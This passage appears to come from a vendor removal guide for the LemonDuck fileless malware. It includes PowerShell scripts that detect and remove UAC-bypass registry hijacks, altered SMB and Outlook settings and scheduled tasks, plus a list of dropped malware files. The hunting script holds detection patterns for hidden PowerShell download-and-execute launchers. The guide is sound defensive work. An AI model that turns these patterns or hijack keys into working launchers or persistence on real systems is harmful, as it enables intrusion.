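$HijackKeys = 'HKCU:\Software\Classes\ms-settings\shell\open\command',
              'HKCU:\Software\Classes\mscfile\shell\open\command'
foreach ($key in $HijackKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    Add-Finding $key '<key>' 'present' '{Default} (key absent)'
    $props = Get-ItemProperty -LiteralPath $key
    foreach ($name in 'DelegateExecute', '(default)') {
        # An empty DelegateExecute ({Null} above) is still a hit: $null -ne ''.
        if ($null -ne $props.$name) { Add-Finding $key $name $props.$name '{Default} (value absent)' }
    }
    if ($Remediate) { Remove-Item -LiteralPath $key -Recurse -Force }
}

# 2. SMB server compression flag (write-up: malware sets it to 1). Some
#    administrators set this deliberately as SMBv3 hardening, so confirm
#    with the system owner before reverting.
$Lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$dc = (Get-ItemProperty -LiteralPath $Lanman -ErrorAction SilentlyContinue).DisableCompression
if ($dc -eq 1) {
    Add-Finding $Lanman 'DisableCompression' $dc '{Default} (value absent)'
    if ($Remediate) { Remove-ItemProperty -LiteralPath $Lanman -Name DisableCompression }
}

# 3. Outlook programmatic-access guard. Key paths are an assumption (the
#    write-up only names "Outlook\Security"); wildcard covers Office versions.
$OutlookKeys = Resolve-Path 'HKCU:\Software\Microsoft\Office\*\Outlook\Security',
                            'HKCU:\Software\Policies\Microsoft\Office\*\Outlook\Security' `
                            -ErrorAction SilentlyContinue
foreach ($key in $OutlookKeys) {
    $omg = (Get-ItemProperty -LiteralPath $key.Path).ObjectModelGuard
    if ($omg -eq 2) {
        Add-Finding $key.Path 'ObjectModelGuard' $omg '{Default} (value absent)'
        if ($Remediate) { Remove-ItemProperty -LiteralPath $key.Path -Name ObjectModelGuard }
    }
}

if ($Findings.Count) { $Findings | Format-Table -Wrap -AutoSize }
else                 { Write-Host 'No listed registry modifications found.' }
```

Run it once without `-Remediate` and keep the output as part of the incident record; the `(default)` command string, in particular, contains the download URL the host was talking to. Where `ObjectModelGuard` sits under the `Policies` hive it may be reapplied by Group Policy, so the fix belongs in the GPO rather than on the endpoint.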
Step 5
Deleting Scheduled Tasks
The following {Task Name} - {Task to be run} pairs should be used in the steps identified below:
For Windows 2000, Windows XP, and Windows Server 2003:
- Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>System Tools>Scheduled Tasks.
- Locate each {Task Name} value listed above in the Name column.
- Right-click on the said file(s) with the aforementioned value.
- Click on Properties. In the Run field, check for the listed {Task to be run}.
- If the strings match the list above, delete the task.
For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:
- Open the Windows Task Scheduler. To do this:
  • On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
  • On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
- In the left panel, click Task Scheduler Library.
- In the upper-middle panel, locate each {Task Name} value listed above in the Name column.
- In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
- If the said string is found, delete the task.
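Since the task names on this page are given only as `{Task Name}` placeholders, a scripted version of Step 5 has to key on the action strings instead. The commands recorded in Step 4 (`powershell -w hidden`, `Iex`, `(new-object net.webclient).downloadstring(...)`) are distinctive enough for that. The script below is an added hunting example, not Trend Micro's tooling; it walks every registered task, inspects the exec actions and reports the ones whose command line matches those patterns. It assumes the `ScheduledTasks` module (Windows 8 / Server 2012 or later).

```powershell
# Added hunting example (not Trend Micro's tooling). Scans scheduled-task
# actions for the launcher strings the write-up records in Step 4.
$SuspectPatterns = @(
    '-w\s+hidden',        # powershell -w hidden
    '\bIex\b',            # Invoke-Expression alias
    'downloadstring',     # (new-object net.webclient).downloadstring(...)
    'net\.webclient'
)

function Find-SuspectScheduledTask {
    [CmdletBinding()]
    param([string[]]$Patterns = $SuspectPatterns)

    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in $task.Actions) {
            # Only exec actions carry a command line; COM-handler actions do not.
            if (-not ($action.PSObject.Properties.Name -contains 'Execute')) { continue }
            $cmdline = "$($action.Execute) $($action.Arguments)"
            # -match is case-insensitive, so 'Iex' and 'DownloadString' both match.
            $matched = @($Patterns | Where-Object { $cmdline -match $_ })
            if ($matched.Count -gt 0) {
                [pscustomobject]@{
                    TaskPath = $task.TaskPath
                    TaskName = $task.TaskName
                    State    = $task.State
                    Command  = $cmdline
                    Matched  = ($matched -join ', ')
                }
            }
        }
    }
}

# Usage: report, review, then remove confirmed tasks (the scripted form of
# the manual deletion described in Step 5).
$suspects = Find-SuspectScheduledTask
$suspects | Format-Table -Wrap -AutoSize
# $suspects | ForEach-Object {
#     Unregister-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Confirm:$false
# }
```

Treat a match as a candidate, not a verdict: administrative scripts also use `-w hidden` and `Invoke-Expression`, so confirm that the `Command` column points at the download pattern from Step 4 before unregistering anything.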
Step 6
Search for and delete these files
- {Removable/Network Drive name}\Dblue3.lnk
- {Removable/Network Drive name}\Eblue3.lnk
- {Removable/Network Drive name}\Fblue3.lnk
- {Removable/Network Drive name}\Gblue3.lnk
- {Removable/Network Drive name}\Hblue3.lnk
- {Removable/Network Drive name}\Iblue3.lnk
- {Removable/Network Drive name}\Jblue3.lnk
- {Removable/Network Drive name}\Kblue3.lnk
- {Removable/Network Drive name}\Dblue6.lnk
- {Removable/Network Drive name}\Eblue6.lnk
- {Removable/Network Drive name}\Fblue6.lnk
- {Removable/Network Drive name}\Gblue6.lnk
- {Removable/Network Drive name}\Hblue6.lnk
- {Removable/Network Drive name}\Iblue6.lnk
- {Removable/Network Drive name}\Jblue6.lnk
- {Removable/Network Drive name}\Kblue6.lnk
- {Removable/Network Drive name}\readme.js
- {Removable/Network Drive name}\UTFsync\inf_data
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
- %User Temp%\tt.vbs
- %User Temp%\m6.bin
- %User Temp%\m6g.bin
- %User Temp%\kr.bin
- %User Temp%\if.bin
- %User Temp%\if_mail.bin
- %User Temp%\ode.bin
- %User Temp%\nvd.zip
- %User Temp%\mimi.dat
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp
- {Malware Path}\dn.ps1
- {Malware Path}\m6.exe
- {Malware Path}\svchost.dat
Step 7
Restart in normal mode and scan your computer with your Trend Micro product for files detected as Fileless.LEMONDUCK. If the detected files have already been cleaned, deleted or quarantined by your Trend Micro product, no further steps are required. Quarantined files can simply be deleted. See this Knowledge Base page for more information.